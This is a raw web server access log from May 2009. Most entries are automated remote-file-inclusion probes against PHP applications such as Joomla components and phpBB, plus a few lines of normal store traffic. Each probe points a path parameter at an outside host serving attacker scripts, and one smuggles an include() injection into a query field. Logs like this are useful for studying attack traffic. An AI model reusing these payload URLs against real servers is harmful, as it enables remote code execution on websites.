88.84.128.40 - - [16/May/2009:01:59:27 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
72.52.230.168 - - [16/May/2009:01:59:29 -0400] "GET /logs/access_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:01:59:36 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:01:59:36 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:01:59:36 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:01:59:38 -0400] "GET /logs/access_log.Q108082100//?sIncPath=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:01:59:57 -0400] "GET /modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:01:59:57 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:01:59:57 -0400] "GET /logs/access_log.Q109050800/modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:01:59:59 -0400] "GET /logs/access_log.Q108080900%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.52.164.18 - - [16/May/2009:01:59:59 -0400] "GET /logs/access_log.Q108112200%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 264 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:59:59 -0400] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:59:59 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
85.214.86.93 - - [16/May/2009:02:00:05 -0400] "GET /logs/access_log.Q108081300/modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:02:00:06 -0400] "GET /logs/error_log.Q108090800//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
74.52.164.18 - - [16/May/2009:02:00:11 -0400] "GET /logs/access_log.Q108112200%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 264 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:00:11 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:00:11 -0400] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
69.172.92.14 - - [16/May/2009:02:00:11 -0400] "GET /logs/error_log.Q108112000//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:00:12 -0400] "GET /logs/access_log.Q108123000//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:00:13 -0400] "GET /logs/access_log.Q108100600//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:02:00:15 -0400] "GET /logs/error_log.Q108112000//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:00:20 -0400] "GET /logs/access_log.Q108123000//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
58.227.193.198 - - [16/May/2009:02:00:33 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:02:01:02 -0400] "GET /logs/error_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:02:01:08 -0400] "GET /logs/error_log.Q109050900//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
209.59.12.99 - - [16/May/2009:02:01:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.52.255.82 - - [16/May/2009:02:01:26 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:02:01:26 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
210.118.194.200 - - [16/May/2009:02:01:41 -0400] "GET /logs//?_zb_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
210.118.194.200 - - [16/May/2009:02:01:41 -0400] "GET //?_zb_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:02:01:41 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:02:01:41 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:02:01:41 -0400] "GET /logs/access_log.Q108070300/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.52.164.18 - - [16/May/2009:02:01:52 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:01:57 -0400] "GET /logs/access_log.Q108112200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:02:01 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:02:02:02 -0400] "GET /logs/access_log.Q108112200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
85.214.86.93 - - [16/May/2009:02:02:04 -0400] "GET /logs/access_log.Q109050800%20%20/modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:02:02:09 -0400] "GET /logs/access_log.Q108081300%20%20/modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:02:02:22 -0400] "GET /logs/access_log.Q108090700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:02:02:22 -0400] "GET /logs//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:02:02:22 -0400] "GET //?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:02:02:25 -0400] "GET //?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:02:02:25 -0400] "GET /logs//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
220.181.7.97 - - [16/May/2009:02:02:25 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
77.221.130.2 - - [16/May/2009:02:02:31 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:02:02:31 -0400] "GET /logs/access_log.Q108122400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:02:02:31 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:02:02:35 -0400] "GET //?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.19.228.18 - - [16/May/2009:02:02:35 -0400] "GET /logs//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:02:02:50 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:02:02:50 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.221.130.2 - - [16/May/2009:02:02:52 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:02:02:52 -0400] "GET /logs/access_log.Q108122400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:02:02:52 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:02:02:53 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:02:59 -0400] "GET /logs/error_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:02:02:59 -0400] "GET /logs/error_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.236.44.32 - - [16/May/2009:02:03:04 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
222.236.44.32 - - [16/May/2009:02:03:05 -0400] "GET /logs/access_log.Q108081400//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
222.236.44.32 - - [16/May/2009:02:03:05 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
87.106.135.14 - - [16/May/2009:02:03:06 -0400] "GET /logs/access_log.Q108090800//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
123.125.64.38 - - [16/May/2009:02:03:14 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.172.92.14 - - [16/May/2009:02:03:18 -0400] "GET /logs/access_log.Q108090800//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
77.221.130.2 - - [16/May/2009:02:03:20 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.44.32 - - [16/May/2009:02:03:46 -0400] "GET /logs/access_log.Q108081600//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [16/May/2009:02:04:09 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
190.144.44.36 - - [16/May/2009:02:04:09 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
88.84.128.40 - - [16/May/2009:02:05:09 -0400] "GET /logs/error_log.Q108112000//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:05:10 -0400] "GET /logs/access_log.Q108123000//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:05:24 -0400] "GET /logs/access_log.Q108100900//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:05:24 -0400] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:02:05:24 -0400] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:02:05:26 -0400] "GET /logs/access_log.Q108100900//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:05:26 -0400] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:02:05:26 -0400] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
222.236.44.32 - - [16/May/2009:02:05:29 -0400] "GET /logs/access_log.Q108081400//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
222.236.44.32 - - [16/May/2009:02:05:29 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
222.236.44.32 - - [16/May/2009:02:05:29 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
88.84.128.40 - - [16/May/2009:02:05:31 -0400] "GET /logs/access_log.Q108100900//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:02:05:31 -0400] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
75.22.73.43 - - [16/May/2009:02:05:31 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02 HTTP/1.1" 200 53466 "http://www.acesurgical.com/conform.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
88.84.128.40 - - [16/May/2009:02:05:31 -0400] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
75.22.73.43 - - [16/May/2009:02:05:32 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:05:33 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:05:33 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:05:33 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:05:33 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:05:34 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:05:34 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:05:34 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:05:34 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:05:34 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:05:34 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:05:35 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.22.73.43 - - [16/May/2009:02:05:35 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):02" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MEGAUPLOAD 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
